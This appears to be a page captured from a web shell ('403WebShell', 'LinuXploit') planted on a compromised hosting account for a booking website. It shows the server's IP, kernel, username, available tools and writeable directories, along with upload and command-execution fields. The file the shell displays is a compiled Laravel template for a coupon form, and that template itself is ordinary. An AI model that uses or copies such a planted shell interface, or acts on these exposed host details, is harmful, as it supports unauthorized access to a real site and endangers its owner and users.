Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.15.225.164
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/storage/framework/views/69d61fa4279b85a4385ccedf7c4f9889ef97a333.php
<li class="d-flex flex-column border-0 mb-0">
    <div class="section-coupon-form">
        <?php if(in_array($booking->status , ['draft'])): ?>
            <div class="input-group group-form mb-3">
                <input type="text" class="form-control" name="coupon_code" placeholder="<?php echo e(__("Coupon code")); ?>">
                <div class="input-group-append">
                    <button class="btn btn-primary bravo_apply_coupon" type="button">
                        <?php echo e(__("Apply")); ?>

                        <i class="fa fa-spin fa-spinner d-none"></i>
                    </button>
                </div>
            </div>
        <?php endif; ?>
        <?php if(!empty($booking->coupons)): ?>
            <ul class="p-0 mb-3 list-coupons">
                <?php $__currentLoopData = $booking->coupons; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $item): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                    <li class="item">
                        <div class="label">
                            <?php echo e($item->coupon_data['code']); ?>

                            <i data-toggle="tooltip" data-placement="top" class="icofont-info-circle" data-original-title="<?php echo e($item->coupon_data['name']); ?>"></i>
                        </div>
                        <div class="val">
                            -<?php echo e(format_money( $item->coupon_amount )); ?>

                            <?php if(in_array($booking->status , ['draft'])): ?>
                                <a href="#" data-code="<?php echo e($item->coupon_code); ?>" class="text-danger text-decoration-none bravo_remove_coupon">
                                <?php echo e(__("[Remove]")); ?>

                                <i class="fa fa-spin fa-spinner d-none"></i>
                            </a>
                            <?php endif; ?>
                        </div>
                    </li>
                <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
            </ul>
        <?php endif; ?>
        <div class="message alert-text mt-2"></div>
    </div>
</li><?php /**PATH /home/wavevlvu/book24.ng/modules/Coupon/Views/frontend/booking/checkout-coupon.blade.php ENDPATH**/ ?>

Youez - 2016 - github.com/yon3zu
LinuXploit